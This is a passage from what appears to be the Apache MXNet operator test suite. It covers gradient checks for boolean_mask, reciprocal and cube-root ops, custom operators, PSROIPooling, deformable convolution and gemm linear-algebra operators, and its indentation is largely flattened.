# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
    # the gradient was accumulated over T iterations with grad_req='add'
    grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
# helper function to identify inputs likely to fail the check_numeric_gradient tolerance test
# due to finite difference method inaccuracies or function discontinuities at the origin
def bad_input_finder(f, f_grad, dtype):
eps = default_numeric_eps()[np.dtype(dtype)]
rtol = default_rtols()[np.dtype(dtype)]
def expected_relative_error(x):
fd_gradient = (f(x+eps/2) - f(x-eps/2)) / eps
return abs(fd_gradient/f_grad(x) - 1)
def is_fd_problem_input(x):
return abs(x) < eps/2 or expected_relative_error(x) > rtol
return np.vectorize(is_fd_problem_input)
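# How bad_input_finder flags an input (our summary of the helper above): the central
# difference (f(x + eps/2) - f(x - eps/2)) / eps is compared with the analytic
# derivative f_grad(x); an input is rejected when the relative error exceeds the
# default rtol for the dtype, or when |x| < eps/2 so the stencil would straddle the
# discontinuity at the origin. np.reciprocal near 0 is the canonical example, which
# is why the tests below replace such inputs with 1.0.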
def test_reciprocal_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(np.reciprocal,
lambda x: -np.reciprocal(x)**2, np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
def test_cbrt_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(np.cbrt,
lambda x: 1./(3 * np.cbrt(x)**2), np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
def test_rcbrt_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(lambda x: 1./np.cbrt(x),
lambda x: -1./(3 * np.cbrt(x)**4), np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output, expected_output, rtol=rtol, atol=atol)
assert_almost_equal(x2.grad, expected_grad, rtol=rtol, atol=atol)
    # test for backward compatibility, i.e. the correctness of the default storage type
    # inference in a custom operator
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x, np.ones(shape=(10, 10), dtype=np.float32))
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/17467")
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork in windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
def test_custom_op_exc():
    # test exception handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_context().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc4)
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
                    feat_height = int(image_height * spatial_scale)
                    feat_width = int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@pytest.mark.parametrize('num_batch', [1, 2])
@pytest.mark.parametrize('num_channel_data_deformable_group', itertools.product([4, 8], [1, 2]))
@pytest.mark.parametrize('input_height_width', itertools.product([5, 6], [5, 6]))
@pytest.mark.parametrize('dilate', [(1, 1), (2, 2)])
@pytest.mark.parametrize('grad_nodes', [['im_data'], ['offset_data'], ['weight']])
def test_deformable_convolution(num_batch, num_channel_data_deformable_group, input_height_width,
dilate, grad_nodes):
num_channel_data, num_deformable_group = num_channel_data_deformable_group
input_height, input_width = input_height_width
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data").as_np_ndarray()
offset_data_var = mx.symbol.Variable(name="offset_data").as_np_ndarray()
weight_var = mx.symbol.Variable(name="weight").as_np_ndarray()
bias_var = mx.symbol.Variable(name="bias").as_np_ndarray()
op = mx.sym.npx.deformable_convolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
    # For now, only a GPU implementation exists
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0), numeric_eps=1.0/64)
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
                                # if the following condition holds, the sampling location is not differentiable
# therefore we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
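# What _validate_sample_location does (our summary of the loop above): it replays the
# deformable PSROIPooling sampling grid in numpy and, whenever a sampling coordinate
# falls within 1e-3 of an integer grid line (where bilinear interpolation is not
# differentiable), it redraws the corresponding offsets until every sample point lies
# safely inside a cell, then returns the adjusted offsets.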
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
                    feat_height = int(image_height * spatial_scale)
                    feat_width = int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
                    # bilinear interpolation is not differentiable exactly on the grid lines, so we
                    # validate the sampling locations and resample the offsets where necessary
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
                    # For now, only a GPU implementation exists
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw=None, atol_fw=None,
                      rtol_bw=None, atol_bw=None, num_eps=None):
def np_random_data(shape, dtype=np.float32):
return np.random.uniform(low=-0.5,
high=0.5, size=shape).astype(dtype)
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np_random_data(shape1, dtype)
data_in2 = np_random_data(shape2, dtype)
data_in3 = np_random_data(shape3, dtype)
data_in4 = np_random_data(shape4, dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check for different axis that describes matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
    test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis=0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
    test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis=-3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
    test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis=0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
    test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis=-3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
# Test gemm separately from other la-operators.
def test_gemm():
_gemm_test_helper(np.float64, True)
with environment('MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION', '0'):
_gemm_test_helper(np.float32, True)
if default_context().device_type == 'gpu':
with environment('MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION', '1'):
_gemm_test_helper(np.float32, True)
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
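# _make_symm_symbol is the symbolic analogue of symmetrizing with numpy. A minimal
# array-level sketch for reference (the helper name is ours, for illustration only):
def _symmetrize_np(a):
    # average a (batch of) square matrices with their transposes over the last two axes
    return 0.5 * (a + np.swapaxes(a, -1, -2))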
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
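# Conceptually, _make_triangle_symm builds the same mask that np.tril / np.triu would
# apply to each trailing m x m block: with lower=True only the lower triangle
# (including the diagonal) survives the elementwise product, and with lower=False the
# mask is transposed so that the upper triangle is kept instead.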
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@xfail_when_nonstandard_decimal_separator
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 2e-6
rtol_bw = 1e-5
atol_bw = 1e-5
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
def check_fw_grad(sym, location, expected):
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
if grad_check == 1:
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
matrix = np.array([[9., 3., -6., 12.],
